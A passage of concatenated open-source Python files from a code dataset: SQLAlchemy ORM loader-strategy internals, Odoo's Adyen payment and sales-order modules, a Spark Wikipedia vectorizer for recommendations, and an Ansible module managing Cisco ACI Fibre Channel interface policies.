:param criterion: an optional ClauseElement formulated against the
member class' table or attributes.
:param \**kwargs: key/value pairs corresponding to member class
attribute names which will be compared via equality to the
corresponding values.
"""
return self.operate(PropComparator.has_op, criterion, **kwargs)
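    # Usage sketch (User/Address are assumed mapped classes, not defined
    # here): both operators render as correlated EXISTS subqueries, e.g.
    #
    #     session.query(User).filter(
    #         User.addresses.any(Address.email == 'foo'))
    #     session.query(Address).filter(Address.user.has(name='ed'))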
class StrategizedProperty(MapperProperty):
"""A MapperProperty which uses selectable strategies to affect
loading behavior.
There is a single strategy selected by default. Alternate
strategies can be selected at Query time through the usage of
``StrategizedOption`` objects via the Query.options() method.
"""
strategy_wildcard_key = None
def _get_context_loader(self, context, path):
load = None
# use EntityRegistry.__getitem__()->PropRegistry here so
# that the path is stated in terms of our base
search_path = dict.__getitem__(path, self)
# search among: exact match, "attr.*", "default" strategy
# if any.
for path_key in (
search_path._loader_key,
search_path._wildcard_path_loader_key,
search_path._default_path_loader_key
):
if path_key in context.attributes:
load = context.attributes[path_key]
break
return load
def _get_strategy(self, key):
try:
return self._strategies[key]
except KeyError:
cls = self._strategy_lookup(*key)
self._strategies[key] = self._strategies[cls] = strategy = cls(self)
return strategy
def _get_strategy_by_cls(self, cls):
return self._get_strategy(cls._strategy_keys[0])
def setup(self, context, entity, path, adapter, **kwargs):
loader = self._get_context_loader(context, path)
if loader and loader.strategy:
strat = self._get_strategy(loader.strategy)
else:
strat = self.strategy
strat.setup_query(context, entity, path, loader, adapter, **kwargs)
def create_row_processor(self, context, path, mapper, row, adapter):
loader = self._get_context_loader(context, path)
if loader and loader.strategy:
strat = self._get_strategy(loader.strategy)
else:
strat = self.strategy
return strat.create_row_processor(context, path, loader,
mapper, row, adapter)
def do_init(self):
self._strategies = {}
self.strategy = self._get_strategy_by_cls(self.strategy_class)
def post_instrument_class(self, mapper):
if self.is_primary() and \
not mapper.class_manager._attr_has_impl(self.key):
self.strategy.init_class_attribute(mapper)
_strategies = collections.defaultdict(dict)
@classmethod
def strategy_for(cls, **kw):
def decorate(dec_cls):
dec_cls._strategy_keys = []
key = tuple(sorted(kw.items()))
cls._strategies[cls][key] = dec_cls
dec_cls._strategy_keys.append(key)
return dec_cls
return decorate
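    # Registration sketch, mirroring how sqlalchemy.orm.strategies uses this
    # decorator; _strategy_lookup() later maps the sorted kwarg tuple back to
    # the registered class:
    #
    #     @ColumnProperty.strategy_for(instrument=True, deferred=False)
    #     class ColumnLoader(LoaderStrategy):
    #         ...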
@classmethod
def _strategy_lookup(cls, *key):
for prop_cls in cls.__mro__:
if prop_cls in cls._strategies:
strategies = cls._strategies[prop_cls]
try:
return strategies[key]
except KeyError:
pass
raise Exception("can't locate strategy for %s %s" % (cls, key))
class MapperOption(object):
"""Describe a modification to a Query."""
propagate_to_loaders = False
"""if True, indicate this option should be carried along
Query object generated by scalar or object lazy loaders.
"""
def process_query(self, query):
pass
def process_query_conditionally(self, query):
"""same as process_query(), except that this option may not
apply to the given query.
Used when secondary loaders resend existing options to a new
Query."""
self.process_query(query)
class LoaderStrategy(object):
"""Describe the loading behavior of a StrategizedProperty object.
The ``LoaderStrategy`` interacts with the querying process in three
ways:
* it controls the configuration of the ``InstrumentedAttribute``
placed on a class to handle the behavior of the attribute. this
may involve setting up class-level callable functions to fire
off a select operation when the attribute is first accessed
(i.e. a lazy load)
* it processes the ``QueryContext`` at statement construction time,
where it can modify the SQL statement that is being produced.
Simple column attributes may add their represented column to the
list of selected columns, *eager loading* properties may add
``LEFT OUTER JOIN`` clauses to the statement.
* It produces "row processor" functions at result fetching time.
These "row processor" functions populate a particular attribute
on a particular mapped instance.
"""
def __init__(self, parent):
self.parent_property = parent
self.is_class_level = False
self.parent = self.parent_property.parent
self.key = self.parent_property.key
def init_class_attribute(self, mapper):
pass
def setup_query(self, context, entity, path, loadopt, adapter, **kwargs):
pass
def create_row_processor(self, context, path, loadopt, mapper,
row, adapter):
"""Return row processing functions which fulfill the contract
specified by MapperProperty.create_row_processor.
StrategizedProperty delegates its create_row_processor method
directly to this method. """
return None, None, None
def __str__(self):
return str(self.parent_property)
|
luistorresm/odoo | refs/heads/8.0 | addons/payment_adyen/models/adyen.py | 165 | # -*- coding: utf-'8' "-*-"
import base64
try:
import simplejson as json
except ImportError:
import json
from hashlib import sha1
import hmac
import logging
import urlparse
from openerp.addons.payment.models.payment_acquirer import ValidationError
from openerp.addons.payment_adyen.controllers.main import AdyenController
from openerp.osv import osv, fields
from openerp.tools import float_round
_logger = logging.getLogger(__name__)
class AcquirerAdyen(osv.Model):
_inherit = 'payment.acquirer'
def _get_adyen_urls(self, cr, uid, environment, context=None):
""" Adyen URLs
- yhpp: hosted payment page: pay.shtml for single, select.shtml for multiple
"""
return {
'adyen_form_url': 'https://%s.adyen.com/hpp/pay.shtml' % ('live' if environment == 'prod' else environment),
}
def _get_providers(self, cr, uid, context=None):
providers = super(AcquirerAdyen, self)._get_providers(cr, uid, context=context)
providers.append(['adyen', 'Adyen'])
return providers
_columns = {
'adyen_merchant_account': fields.char('Merchant Account', required_if_provider='adyen'),
'adyen_skin_code': fields.char('Skin Code', required_if_provider='adyen'),
'adyen_skin_hmac_key': fields.char('Skin HMAC Key', required_if_provider='adyen'),
}
def _adyen_generate_merchant_sig(self, acquirer, inout, values):
""" Generate the shasign for incoming or outgoing communications.
        :param browse acquirer: the payment.acquirer browse record. Its skin
                                HMAC key must be set, as it is used to sign
                                both directions
        :param string inout: 'in' (openerp contacting adyen) or 'out' (adyen
                             contacting openerp). In the latter case only some
                             fields should be contained (see e-Commerce basic)
:param dict values: transaction values
:return string: shasign
"""
assert inout in ('in', 'out')
assert acquirer.provider == 'adyen'
if inout == 'in':
keys = "paymentAmount currencyCode shipBeforeDate merchantReference skinCode merchantAccount sessionValidity shopperEmail shopperReference recurringContract allowedMethods blockedMethods shopperStatement merchantReturnData billingAddressType deliveryAddressType offset".split()
else:
keys = "authResult pspReference merchantReference skinCode merchantReturnData".split()
def get_value(key):
if values.get(key):
return values[key]
return ''
sign = ''.join('%s' % get_value(k) for k in keys).encode('ascii')
key = acquirer.adyen_skin_hmac_key.encode('ascii')
return base64.b64encode(hmac.new(key, sign, sha1).digest())
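    # Illustrative round-trip (values and variable names are made up):
    #
    #     tx_values['merchantSig'] = acq_obj._adyen_generate_merchant_sig(
    #         acquirer, 'in', tx_values)             # signed before posting
    #     check = acq_obj._adyen_generate_merchant_sig(acquirer, 'out', data)
    #     assert check == data.get('merchantSig')    # feedback verification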
def adyen_form_generate_values(self, cr, uid, id, partner_values, tx_values, context=None):
base_url = self.pool['ir.config_parameter'].get_param(cr, uid, 'web.base.url')
acquirer = self.browse(cr, uid, id, context=context)
        # shipBeforeDate / sessionValidity placeholders: valid until tomorrow
        import datetime
        from dateutil import relativedelta
        tmp_date = datetime.date.today() + relativedelta.relativedelta(days=1)
adyen_tx_values = dict(tx_values)
adyen_tx_values.update({
'merchantReference': tx_values['reference'],
'paymentAmount': '%d' % int(float_round(tx_values['amount'], 2) * 100),
'currencyCode': tx_values['currency'] and tx_values['currency'].name or '',
'shipBeforeDate': tmp_date,
'skinCode': acquirer.adyen_skin_code,
'merchantAccount': acquirer.adyen_merchant_account,
'shopperLocale': partner_values['lang'],
'sessionValidity': tmp_date,
'resURL': '%s' % urlparse.urljoin(base_url, AdyenController._return_url),
})
if adyen_tx_values.get('return_url'):
adyen_tx_values['merchantReturnData'] = json.dumps({'return_url': '%s' % adyen_tx_values.pop('return_url')})
adyen_tx_values['merchantSig'] = self._adyen_generate_merchant_sig(acquirer, 'in', adyen_tx_values)
return partner_values, adyen_tx_values
def adyen_get_form_action_url(self, cr, uid, id, context=None):
acquirer = self.browse(cr, uid, id, context=context)
return self._get_adyen_urls(cr, uid, acquirer.environment, context=context)['adyen_form_url']
class TxAdyen(osv.Model):
_inherit = 'payment.transaction'
_columns = {
'adyen_psp_reference': fields.char('Adyen PSP Reference'),
}
# --------------------------------------------------
# FORM RELATED METHODS
# --------------------------------------------------
def _adyen_form_get_tx_from_data(self, cr, uid, data, context=None):
reference, pspReference = data.get('merchantReference'), data.get('pspReference')
if not reference or not pspReference:
error_msg = 'Adyen: received data with missing reference (%s) or missing pspReference (%s)' % (reference, pspReference)
_logger.error(error_msg)
raise ValidationError(error_msg)
# find tx -> @TDENOTE use pspReference ?
tx_ids = self.pool['payment.transaction'].search(cr, uid, [('reference', '=', reference)], context=context)
if not tx_ids or len(tx_ids) > 1:
error_msg = 'Adyen: received data for reference %s' % (reference)
if not tx_ids:
error_msg += '; no order found'
else:
                error_msg += '; multiple orders found'
_logger.error(error_msg)
raise ValidationError(error_msg)
tx = self.pool['payment.transaction'].browse(cr, uid, tx_ids[0], context=context)
# verify shasign
shasign_check = self.pool['payment.acquirer']._adyen_generate_merchant_sig(tx.acquirer_id, 'out', data)
if shasign_check != data.get('merchantSig'):
error_msg = 'Adyen: invalid merchantSig, received %s, computed %s' % (data.get('merchantSig'), shasign_check)
_logger.warning(error_msg)
raise ValidationError(error_msg)
return tx
def _adyen_form_get_invalid_parameters(self, cr, uid, tx, data, context=None):
invalid_parameters = []
# reference at acquirer: pspReference
if tx.acquirer_reference and data.get('pspReference') != tx.acquirer_reference:
invalid_parameters.append(('pspReference', data.get('pspReference'), tx.acquirer_reference))
# seller
if data.get('skinCode') != tx.acquirer_id.adyen_skin_code:
invalid_parameters.append(('skinCode', data.get('skinCode'), tx.acquirer_id.adyen_skin_code))
# result
if not data.get('authResult'):
invalid_parameters.append(('authResult', data.get('authResult'), 'something'))
return invalid_parameters
def _adyen_form_validate(self, cr, uid, tx, data, context=None):
status = data.get('authResult', 'PENDING')
if status == 'AUTHORISED':
tx.write({
'state': 'done',
'adyen_psp_reference': data.get('pspReference'),
# 'date_validate': data.get('payment_date', fields.datetime.now()),
# 'paypal_txn_type': data.get('express_checkout')
})
return True
elif status == 'PENDING':
tx.write({
'state': 'pending',
'adyen_psp_reference': data.get('pspReference'),
})
return True
else:
error = 'Adyen: feedback error'
_logger.info(error)
tx.write({
'state': 'error',
'state_message': error
})
return False
|
tiffanyj41/hermes | refs/heads/master | src/data_prep/wiki_vectorize.py | 3 | from src.utils import article_to_category, glove, remove_templates, clean_categories, clean_links
import string
import numpy as np
class wiki_vectorize():
def __init__(self, user_interactions, content, user_vector_type, content_vector_type, sqlCtx, **support_files):
"""
Class initializer to load the required files.
The wikipedia data will be filtered to only the 2015 edits and content, as well as remove any articles without text,
edits without a user id (IP addresses) and article namespaces that are not 0 (articles).
Args:
user_interactions: The raw RDD of the user interactions. For Wikipedia, this it is the full edit history.
We have been reading it in as wiki_edits = sqlCtx.read.json(wiki_edit_json_data_path, schema=schema)
content: The raw RDD containing the item content. For Wikipedia, this is the latest edit which contains full article content
user_vector_type: The type of user vector desired. For Wikipedia you can choose between ['num_edits', 'any_interact', 'num_edits_ceil', 'none'].
num_edits_ceil will count the number of edits but set an upper limit of 5 edits
If 'none' is used then this means you will run your own custom mapping
content_vector_type: The type of content vector desired. For Wikipedia you can choose between ['glove', 'category_map', 'none'].
If none is chosen no content vector will be returned and None may be passed into the content argument.
You do not need a content vector to run pure CF only but some performance metrics will not be able to be ran
sqlCtx: The sequel content which is necessary for some of the queries
support_files: If they exist, the supporting files, dataFrames, and/or file links necessary to run the content vectors.
For example the category_map function at least needs the category_list from dbPedia
"""
self.user_vector_type = user_vector_type
self.content_vector_type = content_vector_type
self.sqlCtx = sqlCtx
#Filter out uninteresting articles and users if they still exist in the dataset
user_interactions.registerTempTable("ratings")
content.registerTempTable("content")
filtered = self.sqlCtx.sql("select * from ratings where redirect_target is null and article_namespace=0 and user_id is not null and timestamp like '2015%'")
filtered_content = self.sqlCtx.sql("select * from content where redirect_target is null and article_namespace=0 and full_text is not null and timestamp like '2015%'")
self.filtered = filtered
self.filtered.registerTempTable("wiki_ratings")
self.filtered_content = filtered_content
self.filtered_content.registerTempTable("wiki_content")
#if no support files were passed in, initialize an empty support file
if support_files:
self.support_files = support_files
else:
self.support_files = {}
def get_user_vector(self):
if self.user_vector_type=='num_edits':
user_info = self.sqlCtx.sql("select user_id as user, article_id as item, count(1) as rating from wiki_ratings \
group by user_id, article_id")
return user_info.rdd
elif self.user_vector_type=='any_interact':
user_info = self.sqlCtx.sql("select user_id as user, article_id as item, 1 as rating from wiki_ratings \
group by user_id, article_id")
return user_info.rdd
elif self.user_vector_type=='num_edits_ceil':
user_info = self.sqlCtx.sql("select user_id as user, article_id as item, count(1) as rating from wiki_ratings \
group by user_id, article_id")\
.map(lambda (user, article, rating): (user, article, min(rating, 5)))
return user_info
elif self.user_vector_type=='none':
return None
else:
print "Please choose a user_vector_type between num_edits, any_interact, num_edits_ceil or none"
return None
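    # e.g. with user_vector_type='num_edits', user 42 editing article 7 three
    # times in 2015 yields Row(user=42, item=7, rating=3); 'num_edits_ceil'
    # caps the rating at 5.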
def get_content_vector(self):
if self.content_vector_type=='glove':
if "glove_model" in self.support_files:
glove_model = self.support_files["glove_model"]
article_mapping = self.filtered_content\
.map(lambda row: (row.article_id, remove_templates.remove_templates(row.full_text)))\
.map(lambda tup: (tup[0],clean_categories.clean_categories(tup[1])))\
.map(lambda tup: (tup[0],clean_links.clean_links(tup[1])))\
.map(
lambda tup:
(tup[0], tup[1]\
.replace('\n', ' ')\
.replace("<ref>", '')\
.replace("</ref>", '')\
)
)\
.map(lambda tup: (tup[0], remove_punctuation(tup[1])))\
.map(lambda tup: (tup[0], remove_urls(tup[1])))\
.map(lambda tup: (tup[0], article_to_glove(tup[1], glove_model)))
return article_mapping
else:
print "Please pass in a glove_model. Like: support_files['glove_model']=Glove('glove.6B.50d.txt')"
elif self.content_vector_type=='category_map':
if set(["high_level_categories", "category_index_graph_link", "category_idx"]).issubset(self.support_files):
#The category map supporting dataFrames and objects are as followed:
#high_level_idx: An array of the high level categories to map to e.g. ['Concepts', 'Life', 'Physical_universe', 'Society']
#category_index_graph_link: Path to the csv of the category links as created from wiki_categories.create_linked_list()
#category_idx: Dictionary of the categories to an index as created from wiki_categories.create_category_idx_dicts()
high_level_categories = self.support_files['high_level_categories']
category_index_graph_link = self.support_files['category_index_graph_link']
category_idx = self.support_files['category_idx']
ac = article_to_category.article_to_category(high_level_categories, category_index_graph_link, category_idx)
article_mapping = ac.run_mapping(self.filtered_content)
return article_mapping
else:
#print "To run category map you must at least have the category_list from dbPedia"
##TODO work on the article_to_category function so that it can just pull in the category list from dpPedia
print "Please pass in the following files:"
print "high_level_idx: An array of the high level categories to map to e.g. ['Concepts', 'Life', 'Physical_universe', 'Society']"
print 'category_index_graph_link: Path to the csv of the category links as created from wiki_categories.create_linked_list()'
print 'category_idx: Dictionary of the categories to an index as created from wiki_categories.create_category_idx_dicts()'
print 'support_files = {"high_level_categories" : high_level_categories, \
"category_index_graph_link" : category_index_graph_link, \
"category_idx" : category_idx}'
return None
elif self.content_vector_type=='none':
return None
else:
print "Please choose between glove, category_map or none"
return None
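# A hedged usage sketch (argument names follow the __init__ docstring above;
# the GloVe file path and Glove constructor are assumptions):
#
#     vectorizer = wiki_vectorize(wiki_edits, wiki_content,
#                                 user_vector_type='num_edits',
#                                 content_vector_type='glove',
#                                 sqlCtx=sqlCtx,
#                                 glove_model=glove.Glove('glove.6B.50d.txt'))
#     user_rdd = vectorizer.get_user_vector()        # (user, item, rating) rows
#     article_rdd = vectorizer.get_content_vector()  # (article_id, vector) pairs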
def remove_punctuation(text):
for char in string.punctuation:
text = text.replace(char, '')
return text
def article_to_glove(text, model):
vec = np.zeros(model.vector_size)
for word in text.split():
vec += model[word.lower()]
return vec
def remove_urls(text):
    # Drop whitespace-delimited tokens that look like URLs.
    return ' '.join(word for word in text.split() if not word.startswith('http')) |
tima/ansible | refs/heads/devel | lib/ansible/modules/network/aci/aci_intf_policy_fc.py | 2 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: aci_intf_policy_fc
short_description: Manage Fibre Channel interface policies on Cisco ACI fabrics (fc:IfPol)
description:
- Manage ACI Fibre Channel interface policies on Cisco ACI fabrics.
- More information from the internal APIC class I(fc:IfPol) at
U(https://developer.cisco.com/docs/apic-mim-ref/).
author:
- Dag Wieers (@dagwieers)
version_added: '2.4'
options:
fc_policy:
description:
    - The name of the Fibre Channel interface policy.
required: yes
aliases: [ name ]
description:
description:
    - The description of the Fibre Channel interface policy.
aliases: [ descr ]
port_mode:
description:
    - The Port Mode, either C(f) (F port, fabric) or C(np) (NP port, node proxy).
choices: [ f, np ]
default: f
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
choices: [ absent, present, query ]
default: present
extends_documentation_fragment: aci
'''
EXAMPLES = r'''
- aci_intf_policy_fc:
hostname: '{{ hostname }}'
username: '{{ username }}'
password: '{{ password }}'
fc_policy: '{{ fc_policy }}'
port_mode: '{{ port_mode }}'
description: '{{ description }}'
state: present
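
# Query an existing policy (a sketch; the same connection details are assumed)
- aci_intf_policy_fc:
    hostname: '{{ hostname }}'
    username: '{{ username }}'
    password: '{{ password }}'
    fc_policy: '{{ fc_policy }}'
    state: query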
'''
RETURN = r'''
#
'''
from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec
from ansible.module_utils.basic import AnsibleModule
def main():
argument_spec = aci_argument_spec()
argument_spec.update(
fc_policy=dict(type='str', required=False, aliases=['name']), # Not required for querying all objects
description=dict(type='str', aliases=['descr']),
port_mode=dict(type='str', choices=['f', 'np']), # No default provided on purpose
state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
method=dict(type='str', choices=['delete', 'get', 'post'], aliases=['action'], removed_in_version='2.6'), # Deprecated starting from v2.6
protocol=dict(type='str', removed_in_version='2.6'), # Deprecated in v2.6
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
['state', 'absent', ['fc_policy']],
['state', 'present', ['fc_policy']],
],
)
fc_policy = module.params['fc_policy']
port_mode = module.params['port_mode']
description = module.params['description']
state = module.params['state']
aci = ACIModule(module)
aci.construct_url(
root_class=dict(
aci_class='fcIfPol',
aci_rn='infra/fcIfPol-{0}'.format(fc_policy),
filter_target='eq(fcIfPol.name, "{0}")'.format(fc_policy),
module_object=fc_policy,
),
)
aci.get_existing()
if state == 'present':
# Filter out module parameters with null values
aci.payload(
aci_class='fcIfPol',
class_config=dict(
name=fc_policy,
descr=description,
portMode=port_mode,
),
)
# Generate config diff which will be used as POST request body
aci.get_diff(aci_class='fcIfPol')
# Submit changes if module not in check_mode and the proposed is different than existing
aci.post_config()
elif state == 'absent':
aci.delete_config()
module.exit_json(**aci.result)
if __name__ == "__main__":
main()
|
OpusVL/odoo | refs/heads/master | addons/sale/sale.py | 1 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
import time
from openerp.osv import fields, osv
from openerp.tools.translate import _
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT
import openerp.addons.decimal_precision as dp
from openerp import workflow
class res_company(osv.Model):
_inherit = "res.company"
_columns = {
'sale_note': fields.text('Default Terms and Conditions', translate=True, help="Default terms and conditions for quotations."),
}
class sale_order(osv.osv):
_name = "sale.order"
_inherit = ['mail.thread', 'ir.needaction_mixin']
_description = "Sales Order"
_track = {
'state': {
'sale.mt_order_confirmed': lambda self, cr, uid, obj, ctx=None: obj.state in ['manual'],
'sale.mt_order_sent': lambda self, cr, uid, obj, ctx=None: obj.state in ['sent']
},
}
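    # _amount_line_tax prices a line net of its discount and sums only the
    # per-tax 'amount' entries returned by compute_all().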
def _amount_line_tax(self, cr, uid, line, context=None):
val = 0.0
for c in self.pool.get('account.tax').compute_all(cr, uid, line.tax_id, line.price_unit * (1-(line.discount or 0.0)/100.0), line.product_uom_qty, line.product_id, line.order_id.partner_id)['taxes']:
val += c.get('amount', 0.0)
return val
def _amount_all_wrapper(self, cr, uid, ids, field_name, arg, context=None):
""" Wrapper because of direct method passing as parameter for function fields """
return self._amount_all(cr, uid, ids, field_name, arg, context=context)
def _amount_all(self, cr, uid, ids, field_name, arg, context=None):
cur_obj = self.pool.get('res.currency')
res = {}
for order in self.browse(cr, uid, ids, context=context):
res[order.id] = {
'amount_untaxed': 0.0,
'amount_tax': 0.0,
'amount_total': 0.0,
}
val = val1 = 0.0
cur = order.pricelist_id.currency_id
for line in order.order_line:
val1 += line.price_subtotal
val += self._amount_line_tax(cr, uid, line, context=context)
res[order.id]['amount_tax'] = cur_obj.round(cr, uid, cur, val)
res[order.id]['amount_untaxed'] = cur_obj.round(cr, uid, cur, val1)
res[order.id]['amount_total'] = res[order.id]['amount_untaxed'] + res[order.id]['amount_tax']
return res
def _invoiced_rate(self, cursor, user, ids, name, arg, context=None):
res = {}
for sale in self.browse(cursor, user, ids, context=context):
if sale.invoiced:
res[sale.id] = 100.0
continue
tot = 0.0
for invoice in sale.invoice_ids:
if invoice.state not in ('draft', 'cancel'):
tot += invoice.amount_untaxed
if tot:
res[sale.id] = min(100.0, tot * 100.0 / (sale.amount_untaxed or 1.00))
else:
res[sale.id] = 0.0
return res
def _invoice_exists(self, cursor, user, ids, name, arg, context=None):
res = {}
for sale in self.browse(cursor, user, ids, context=context):
res[sale.id] = False
if sale.invoice_ids:
res[sale.id] = True
return res
def _invoiced(self, cursor, user, ids, name, arg, context=None):
res = {}
for sale in self.browse(cursor, user, ids, context=context):
res[sale.id] = True
invoice_existence = False
for invoice in sale.invoice_ids:
if invoice.state!='cancel':
invoice_existence = True
if invoice.state != 'paid':
res[sale.id] = False
break
if not invoice_existence or sale.state == 'manual':
res[sale.id] = False
return res
def _invoiced_search(self, cursor, user, obj, name, args, context=None):
if not len(args):
return []
clause = ''
sale_clause = ''
no_invoiced = False
for arg in args:
if (arg[1] == '=' and arg[2]) or (arg[1] == '!=' and not arg[2]):
clause += 'AND inv.state = \'paid\''
else:
clause += 'AND inv.state != \'cancel\' AND sale.state != \'cancel\' AND inv.state <> \'paid\' AND rel.order_id = sale.id '
sale_clause = ', sale_order AS sale '
no_invoiced = True
cursor.execute('SELECT rel.order_id ' \
'FROM sale_order_invoice_rel AS rel, account_invoice AS inv '+ sale_clause + \
'WHERE rel.invoice_id = inv.id ' + clause)
res = cursor.fetchall()
if no_invoiced:
cursor.execute('SELECT sale.id ' \
'FROM sale_order AS sale ' \
'WHERE sale.id NOT IN ' \
'(SELECT rel.order_id ' \
'FROM sale_order_invoice_rel AS rel) and sale.state != \'cancel\'')
res.extend(cursor.fetchall())
if not res:
return [('id', '=', 0)]
return [('id', 'in', [x[0] for x in res])]
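    # Note on _invoiced_search above: [('invoiced', '=', False)] also matches
    # orders with no invoices at all, via the second query.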
def _get_order(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('sale.order.line').browse(cr, uid, ids, context=context):
result[line.order_id.id] = True
return result.keys()
def _get_default_company(self, cr, uid, context=None):
company_id = self.pool.get('res.users')._get_company(cr, uid, context=context)
if not company_id:
raise osv.except_osv(_('Error!'), _('There is no default company for the current user!'))
return company_id
def _get_default_team_id(self, cr, uid, context=None):
""" Gives default team by checking if present in the context """
team_id = self._resolve_team_id_from_context(cr, uid, context=context) or False
return team_id
def _resolve_team_id_from_context(self, cr, uid, context=None):
""" Returns ID of team based on the value of 'team_id'
context key, or None if it cannot be resolved to a single
Sales Team.
"""
if context is None:
context = {}
if type(context.get('default_team_id')) in (int, long):
return context.get('default_team_id')
if isinstance(context.get('default_team_id'), basestring):
team_ids = self.pool.get('crm.team').name_search(cr, uid, name=context['default_team_id'], context=context)
if len(team_ids) == 1:
return int(team_ids[0][0])
return None
_columns = {
'name': fields.char('Order Reference', required=True, copy=False,
readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, select=True),
'origin': fields.char('Source Document', help="Reference of the document that generated this sales order request."),
'client_order_ref': fields.char('Customer Reference', copy=False),
'state': fields.selection([
('draft', 'Draft Quotation'),
('sent', 'Quotation Sent'),
('cancel', 'Cancelled'),
('waiting_date', 'Waiting Schedule'),
('progress', 'Sales Order'),
('manual', 'Sale to Invoice'),
('shipping_except', 'Shipping Exception'),
('invoice_except', 'Invoice Exception'),
('done', 'Done'),
], 'Status', readonly=True, copy=False, help="Gives the status of the quotation or sales order.\
\nThe exception status is automatically set when a cancel operation occurs \
in the invoice validation (Invoice Exception) or in the picking list process (Shipping Exception).\nThe 'Waiting Schedule' status is set when the invoice is confirmed\
but waiting for the scheduler to run on the order date.", select=True),
'date_order': fields.datetime('Date', required=True, readonly=True, select=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, copy=False),
'validity_date': fields.date('Expiration Date', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}),
'create_date': fields.datetime('Creation Date', readonly=True, select=True, help="Date on which sales order is created."),
'date_confirm': fields.date('Confirmation Date', readonly=True, select=True, help="Date on which sales order is confirmed.", copy=False),
'user_id': fields.many2one('res.users', 'Salesperson', states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, select=True, track_visibility='onchange'),
'partner_id': fields.many2one('res.partner', 'Customer', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, required=True, change_default=True, select=True, track_visibility='always'),
'partner_invoice_id': fields.many2one('res.partner', 'Invoice Address', readonly=True, required=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help="Invoice address for current sales order."),
'partner_shipping_id': fields.many2one('res.partner', 'Delivery Address', readonly=True, required=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help="Delivery address for current sales order."),
'order_policy': fields.selection([
('manual', 'On Demand'),
], 'Create Invoice', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""This field controls how invoice and delivery operations are synchronized."""),
'pricelist_id': fields.many2one('product.pricelist', 'Pricelist', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help="Pricelist for current sales order."),
'currency_id': fields.related('pricelist_id', 'currency_id', type="many2one", relation="res.currency", string="Currency", readonly=True, required=True),
'project_id': fields.many2one('account.analytic.account', 'Contract / Analytic', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help="The analytic account related to a sales order."),
'order_line': fields.one2many('sale.order.line', 'order_id', 'Order Lines', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, copy=True),
'invoice_ids': fields.many2many('account.invoice', 'sale_order_invoice_rel', 'order_id', 'invoice_id', 'Invoices', readonly=True, copy=False, help="This is the list of invoices that have been generated for this sales order. The same sales order may have been invoiced in several times (by line for example)."),
'invoiced_rate': fields.function(_invoiced_rate, string='Invoiced Ratio', type='float'),
'invoiced': fields.function(_invoiced, string='Paid',
fnct_search=_invoiced_search, type='boolean', help="It indicates that an invoice has been paid."),
'invoice_exists': fields.function(_invoice_exists, string='Invoiced',
fnct_search=_invoiced_search, type='boolean', help="It indicates that sales order has at least one invoice."),
'note': fields.text('Terms and conditions'),
'amount_untaxed': fields.function(_amount_all_wrapper, digits_compute=dp.get_precision('Account'), string='Untaxed Amount',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty'], 10),
},
multi='sums', help="The amount without tax.", track_visibility='always'),
'amount_tax': fields.function(_amount_all_wrapper, digits_compute=dp.get_precision('Account'), string='Taxes',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty'], 10),
},
multi='sums', help="The tax amount."),
'amount_total': fields.function(_amount_all_wrapper, digits_compute=dp.get_precision('Account'), string='Total',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty'], 10),
},
multi='sums', help="The total amount."),
'payment_term': fields.many2one('account.payment.term', 'Payment Term'),
'fiscal_position': fields.many2one('account.fiscal.position', 'Fiscal Position'),
'company_id': fields.many2one('res.company', 'Company'),
'team_id': fields.many2one('crm.team', 'Sales Team', oldname='section_id', change_default=True),
'procurement_group_id': fields.many2one('procurement.group', 'Procurement group', copy=False),
'product_id': fields.related('order_line', 'product_id', type='many2one', relation='product.product', string='Product'),
}
_defaults = {
'date_order': fields.datetime.now,
'order_policy': 'manual',
'company_id': _get_default_company,
'state': 'draft',
'user_id': lambda obj, cr, uid, context: uid,
'name': lambda obj, cr, uid, context: '/',
'partner_invoice_id': lambda self, cr, uid, context: context.get('partner_id', False) and self.pool.get('res.partner').address_get(cr, uid, [context['partner_id']], ['invoice'])['invoice'],
'partner_shipping_id': lambda self, cr, uid, context: context.get('partner_id', False) and self.pool.get('res.partner').address_get(cr, uid, [context['partner_id']], ['delivery'])['delivery'],
